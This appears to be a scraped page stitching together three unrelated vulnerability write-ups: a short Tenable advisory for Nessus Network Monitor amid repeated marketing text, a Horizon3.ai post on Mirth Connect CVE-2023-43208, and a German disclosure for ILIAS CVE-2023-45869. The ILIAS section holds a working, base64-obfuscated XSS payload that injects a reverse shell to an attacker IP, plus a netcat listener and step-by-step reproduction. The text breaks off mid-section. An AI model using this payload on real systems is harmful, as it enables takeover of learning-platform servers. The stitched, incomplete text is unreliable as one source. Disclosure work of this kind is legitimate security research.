
Under certain conditions, Nessus Network Monitor could allow a low privileged user to escalate privileges to NT AUTHORITY\SYSTEM on Windows hosts by replacing a specially crafted file.

_This page contains information regarding security vulnerabilities that may impact Tenable's products. This may include issues specific to our software, or due to the use of third-party libraries within our software. Tenable strongly encourages users to ensure that they upgrade or apply relevant patches in a timely manner._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TNS-2023-34

Credit

Will Dormann - CVE-2023-5622 / CVE-2023-5623

CVSSv3 Base / Temporal Score

7.1 / 6.4 (CVE-2023-5622)

7.0 / 6.3 (CVE-2023-5623)

7.2 / 6.5 (CVE-2023-5624)

6.1 / 5.3 (CVE-2018-25050)

6.1 / 5.5 (CVE-2021-23445)

5.3 / 4.6 (CVE-2023-0465)

5.3 / 4.6 (CVE-2023-0466)

5.9 / 5.2 (CVE-2023-1255)

5.3 / 4.6 (CVE-2023-2650)

5.3 / 4.6 (CVE-2023-3817)

5.3 / 4.6 (CVE-2023-3446)

7.5 / 6.7 (CVE-2023-38039)

7.8 / 6.8 (CVE-2023-4807)

CVSSv3 Vector

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C (CVE-2023-5622)

AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C (CVE-2023-5623)

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C (CVE-2023-5624)

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C (CVE-2018-25050)

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C (CVE-2021-23445)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C (CVE-2023-0465)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:U/RL:O/RC:C (CVE-2023-0466)

AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2023-1255)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-2650)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-3817)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:U/RL:O/RC:C (CVE-2023-3446)

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C (CVE-2023-38039)

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2023-4807)

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

**Tenable Vulnerability Management**

_Formerly Tenable.io_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Nessus Professional Free**

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

**NEW - Tenable Nessus Expert  
Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Pro Trial.

**Buy Tenable Nessus Professional**

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

**Buy Tenable Web App Scanning**

_Formerly Tenable.io Web Application Scanning_

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable Lumin**

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable Security Center**

_Formerly Tenable.sc_

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable OT Security**

_Formerly Tenable.ot_

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable Identity Exposure**

_Formerly Tenable.ad_

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Request a Demo of Tenable Cloud Security**

_**Exceptional unified cloud security awaits you!**_

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable Attack Surface Management In Action**

_Formerly Tenable.asm_

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

**Try Tenable Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Tenable Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Tenable Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2023-5622: [R1] Nessus Network Monitor 6.3.0 Fixes Multiple Vulnerabilities

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. This is a bypass of the patch put in for CVE-2023-37679.

**Summary**

Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability, CVE-2023-43208. If you’re a user of Mirth Connect, you’ll want to upgrade to the latest patch release, 4.4.1, as of this writing.

**Background**

A few months ago, we came across an unauthenticated remote code execution vulnerability, CVE-2023-37679, affecting Mirth Connect that was reported by IHTeam. Mirth Connect is an interesting application for us at Horizon3.ai because a number of our clients are in the healthcare space and use this application. Healthcare companies are commonly targeted by ransomware threat actors, and this application has decent exposure on the Internet (about 1200+ unique hosts).

 

CVE-2023-37679 was reported to be fixed in Mirth Connect 4.4.0. In the release notes for 4.4.0, it was reported as only affecting Mirth Connect installs running on Java 8 or below. This caught our attention (why only Java 8?), and we started digging. We found that in fact, all installs of Mirth Connect, regardless of the Java version, were vulnerable. We also found that the patch for CVE-2023-37679 could be bypassed. We subsequently reported a new vulnerability to NextGen, tracked as CVE-2023-43208. The fix for CVE-2023-43208 is in 4.4.1.

**Impact**

This is an easily exploitable, unauthenticated remote code execution vulnerability. Attackers would most likely exploit this vulnerability for initial access or to compromise sensitive healthcare data.

We are not releasing an exploit at this time, but the methods for exploitation (involving Java XStream) are well known and documented. We have verified that Mirth Connect versions going as far back as 2015/2016 are vulnerable.

On Windows systems, where Mirth Connect appears to be most commonly deployed, it typically runs as the SYSTEM user. Here’s an example of exploiting this vulnerability to run the ping command on a Windows host:

 

 

 

**Detection**

The version of the Mirth Connect server can be determined as follows:

% curl  -k -H 'X-Requested-With: OpenAPI' https://<server>:<port>/api/server/version  
4.4.0

Any server reporting a version less than 4.4.1 is highly likely to be exploitable.

**Remediation**

We urge all users of Mirth Connect, especially instances that are Internet-facing, to prioritize updating to 4.4.1 ASAP.

**Timeline**

*   **Sept. 8, 2023**: Horizon3.ai sends initial report to NextGen
*   **Sept. 8, 2023**: NextGen acknowledges receipt
*   **Oct. 6, 2023**: NextGen provides Horizon3.ai a test build for 4.4.1
*   **Oct. 13, 2023**: Horizon3.ai completes testing/review of test build
*   **Oct. 17, 2023**: NextGen releases 4.4.1
*   **Oct. 25, 2023**: This post

We’d like to thank NextGen for the prompt handling of this vulnerability, and a hat tip to IHTeam for discovering the original issue.

**References**

*   Mirth Connect on GitHub
*   Mirth Connect 4.4.1 Release Notes
*   CVE-2023-43208
*   IHTeam Advisory for CVE-2023-37679
*   CVE-2023-37679

**Sign up for a free trial and quickly verify you’re not exploitable.**

Start Your Free Trial

CVE-2023-43208: NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208)

ILIAS 7.25 (2023-09-12) allows any authenticated user to execute arbitrary operating system commands remotely, when a highly privileged account accesses an XSS payload. The injected commands are executed via the exec() function in the execQuoted() method of the ilUtil class (/Services/Utilities/classes/class.ilUtil.php) This allows attackers to inject malicious commands into the system, potentially compromising the integrity, confidentiality, and availability of the ILIAS installation and the underlying operating system.

Vulnerability

Product

Impact

CVE

OS Command Injection

ILIAS

Kritisch

CVE-2023-45869

**Responsible Disclosure**

⚑ 25. Sep. 2023 - Die Sicherheitslücke wurde entdeckt.  
→ 26. Sep. 2023 - Die Sicherheitslücke wurde an ILIAS gemeldet.  
← 29. Sep. 2023 - ILIAS bestätigt den Erhalt des Reports.  
← 06. Okt. 2023 - ILIAS bestätigt, dass die Sicherheitslücke geschlossen wurde.  
← 23. Okt. 2023 - Patched ILIAS-Release: 8.6, 7.26

**1\. Allgemeine Beschreibung**

Die identifizierte Sicherheitslücke wurde in **ILIAS Version7.25 (2023-09-12 Release)** entdeckt.

Es handelt sich um eine sogenannte OS Command Injection Sicherheitslücke. Dies ist eine Sicherheitslücke, bei der von einem Angreifer übermittelte Befehle auf Betriebssystem-Ebene ausgeführt werden können. In diesem Fall ermöglicht die Schwachstelle einem Angreifer Kommandozeilen-Befehle auszuführen.

Ein Benutzer mit Administratorrechten kann Einstellungen für den PDF-Renderer konfigurieren. Ein Angreifer hat in dieser Komponente potenziell die Möglichkeit Systembefehle einzuschleusen, welche die reguläre Befehlsausführung erweitert. Aufgrund fehlender Eingabeüberprüfung ist es möglich, die Befehlskette beliebig zu erweitern.

Eine bekannte Sicherheitslücke (CVE-2022-45915) könnte hierzu hilfreich sein, da dieselbe Komponente betroffen ist. Der entscheidende Unterschied ist, dass für die Übermittlung einer Payload nicht der Pfad zur Binary wkhtmltopdf selbst, sondern Eingabefelder der Options-Parameter vulnerabel sind.

Besonders kritisch macht diese Schwachstelle, dass sie unter Umständen als normaler User ausgenutzt werden kann. Unter "normal" verstehen wir einen User Account mit den voreingestellten Rechten einer aufgesetzten ILIAS Instanz.

Der folgende PoC und die abschließende Klassifizierung bilden das Worst-Case-Szenario ab. Der Angriff erfolgt durch einen Account mit User-Rechten.

**2\. Proof of Concept (PoC)**

 Your browser does not support the video tag.  
Download video? Here.

**3\. Reproduktion der Schwachstelle****3.1 Reproduktionsschritte (Worst-Case)****Vorabhinweis**

Möchten Sie die Schwachstelle nicht mit dem größtmöglichen Impact, sondern auf einfachem Wege als Administrator reproduzieren, überspringen Sie die folgend aufgeführten Schritte und folgen Sie den Anweisungen unter dem Punkt "_3.2 Reproduktionsschritte (als Admin)_".

**Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Erstellen Sie neben dem gegebenen Administrator einen weiteren User Account:

1.  "root" (ein Administrator)
2.  "testuser" (ein normaler User, der Angreifer)

**Schritt 2:**

Aktivieren Sie mit dem Administrator-Account unter Administration > Layout und Navigation > Editor > HTML/Javascript erlauben die Checkbox bei Modules/Portfolio: Portfolioseite.

**Schritt 3:**

Loggen Sie sich mit dem **User Account** "testuser" ein.  
Navigieren Sie auf Persönlicher Arbeitsraum > Portfolio und erstellen Sie ein Portfolio mit einer leeren Seite. Bearbeiten Sie die leere Seite und erstellen Sie das Inhaltselement Text einfügen.

Kopieren Sie die folgende Payload in einen Texteditor Ihrer Wahl. Ersetzen Sie die im Data-Attribut ( data-ip) gegebene IP 123.456.78.910 mit **Ihrer öffentlichen IP** (also die IP-Adresse, welche für eine Verbindung zum Webserver verwendet werden soll – z.B. die Ihres PCs).

<img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

    <img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

Kopieren und fügen Sie die geänderte Payload aus Ihrem Editor in das Textelement auf der Webseite ein und speichern Sie abschließend die Änderung über den Button "Speichern und zurückkehren".

**Schritt 5:**

Führen Sie auf Ihrem PC den folgenden netcat Befehl aus, um über den Port 1234 auf den Verbindungsaufbau mit dem Webserver warten.

nc -nlvp 1234

    nc -nlvp 1234

**Schritt 6:**

Loggen Sie sich **als Administrator** ein und öffnen Sie entweder die zuvor erstellte Portfolioseite des Users "testuser" über einen Direktlink oder über die Portfoliosuche unter Persönlicher Bereich > Portfolio > Portfolios anderer Benutzer.

Die hinterlegte Payload aus Schritt 3 wird beim Aufruf der Portfolioseite direkt ausgeführt. Überprüfen Sie Ihr CLI:

Der Webserver hat eine Verbindung durch eine Reverse Shell mit dem PC aufgebaut. Als potenzieller Angreifer haben Sie mit den Rechten des User www-data Kontrolle über den Webserver, auf dem ILIAS installiert ist.

**Was genau macht die Payload?**

Folgender Befehl wird bei einer Ausführung der OS Command Injection über die Funktion exec() in der Methode execQuoted() der Klasse ilUtil (/Services/Utilities/classes/class.ilUtil.php) gänzlich ausgeführt:

/usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/XXX.XXX.XXX.XXX/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

    /usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

Um die Payload zu verstehen, hilft die Synopsis von wkhtmltopdf:  
wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>

Der CLI-Befehl beginnend mit wkhtmltopdf erscheint mit allen folgenden [GLOBAL OPTION] Parameter bis zu --javascript-delay wie erwartet normal. Die Payload aus Schritt 3 übergibt ab dieser Stelle den Wert 200 für die voranstehende Option und definiert anschließend direkt das [OBJECT] mit der localhost IP als Quelle _(könnte auch eine beliebige URL oder ein existenter Pfad zu einer Datei sein)_. Folgend wird mit /tmp/x.pdf das <output file> bestimmt, welches durch && rm /tmp/x.pdf direkt wieder gelöscht wird _(das Löschen der Datei ist nicht zwingend notwendig)_. Es folgt die Reverse Shell in der Befehlskette, welche mit der IP des Angreifers über den Port 1234 eine Verbindung aufbaut: && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' . Abschließend werden alle nachfolgenden Zeichen des CLI-Befehls mit # auskommentiert.

**3.2 Reproduktionsschritte (als Admin)****Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Loggen Sie sich als Administrator ein.

Navigieren Sie anschließend auf die Seite Administration -> PDF-Erstellung und klicken Sie unter dem Tab Einstellungen auf den Button Konfiguriere Renderer in der Sektion Portfolio / ContentExport.

**Schritt 2:**

Kopieren Sie folgende Payload:

200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

    200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

> Um die erfolgreiche Ausführung einer Injektion simpel überprüfen zu können, wird mit dieser Payload eine Datei "poc.txt" im Verzeichnis "/tmp" auf dem Webserver abgelegt. Siehe Was genau macht die Payload? unter Punkt 3.1 für eine detaillierte Aufschlüsslung technischer Details.

Fügen Sie die kopierte Payload in das Eingabefeld Javascript Verzögerung ein.

**Schritt 3:**

Führen Sie einen PDF-Export über ein beliebiges Modul aus. Zum Beispiel über Portfolio. Erstellen Sie hierzu ein Portfolio und führen Sie einen PDF-Export aus:

**Schritt 4:**

Prüfen Sie auf dem Webserver, ob die Payload erfolgreich ausgeführt wurde:

**Voraussetzungen für die Ausnutzung**

Die Voraussetzungen für den aufgeschlüsselten Worst Case (Punkt 3.1) lauten wie folgt:

*   Ein Angreifer benötigt Zugriff auf einen Account mit mindestens den Rechten eines normalen Users.
*   Die vom Angreifer hinterlegte Payload muss durch eine User-Interaktion eines hoch priviligierten Nutzers (Administrator) über einen Seitenaufruf ausgelöst werden.
*   Die Funktionalität HTML/Javascript erlauben muss für ein beliebiges Modul, für welches ein User Schreibrechte hat, enabled sein.

Sollte die Funktionalität HTML/Javascript erlauben abgeschaltet sein, besteht die Schwachstelle OS Command Injection als solche weiterhin, kann dann aber nur mit Administrationsrechten oder (falls gegeben) durch eine andere XSS Schwachstelle ausgenutzt werden.

**Auswirkungen**

Diese Schwachstelle kann erhebliche Auswirkungen auf die Sicherheit der betroffenen ILIAS-Installation und des zugrunde liegenden Betriebssystem haben. Alle auf dem Server gespeicherten Daten, Dateien und Komponenten, die der Webserver-User mit gegebenen Rechten lesen, schreiben oder ausführen kann, sind potenziell betroffen. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, könnte zudem das System beschädigen oder weitere Angriffe (z.B. auf externe Dienste wie LDAP durch einsehbare Credentials) durchführen.

**Klassifikation**

CVSS: **9.0 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

**Attack Vector (AV): N**  
Es handelt sich um einen Netzwerkangriff. Die verwundbare Komponente ist "aus der Ferne ausnutzbar" und wird als ein Angriff betrachtet, der auf Protokollebene über das Internet stattfindet.

**Attack Complexity (AC): L**  
Besondere Zugangsbedingungen oder mildernde Umstände bestehen nicht. Es MUSS jedoch für eine erfolgreiche Durchführung die Konfiguration "HTML/Javascript erlauben" gesetzt sein. Wenn eine bestimmte Konfiguration für den Erfolg eines Angriffs erforderlich ist, wird die anfällige Komponente nach CVSSv3.1 Spezifikation unter der Annahme bewertet, dass sie sich in dieser Konfiguration befindet.

**Privileges Required (PR): L**  
Der Angreifer benötigt Privilegien, die grundlegende Benutzerfunktionen eines Users bereitstellen.

**User Interaction (UI): R**  
Der platzierte Schadcode muss für einen erfolgreichen Angriff durch eine User-Interaktion eines Administrators ausgeführt werden.

**Scope (S): C**  
Die anfällige Komponente ist die Webanwendung: Die Webanwendung überführt Systembefehle durch Benutzereingaben in eine exec() Funktion. Die betroffene Komponente ist der Webserver: Auf diesen erlangt der Angreifer Zugriff. Es kann sowohl auf das Dateisystem zugegriffen werden, als auch beliebig gespeicherte Daten aus anderen Komponenten (z.B. Datenbanken) extrahiert werden, welche bei normaler Nutzung der Web-Applikation nicht verfügbar sein sollten. Auch können auf dem Server befindliche Programme bzw. Binaries ausgeführt werden.

**Confidentiality (C): H**  
Bei einen erfolgreichen Angriff kommt es zu einem totalen Verlust der Vertraulichkeit. Alle Ressourcen innerhalb der betroffenen Komponente und weiterführend Komponenten des Betriebssystems werden dem Angreifer offengelegt.

**Integrity (I): H**  
Bei einem erfolgreichen Angriff kommt es zu einem totalen Verlust der Integrität. Der Angreifer ist in der Lage, alle geschützten Dateien der betroffenen Komponente und weiterführend Dateien aus Komponenten des Betriebssystems zu verändern.

**Availability (A): H**  
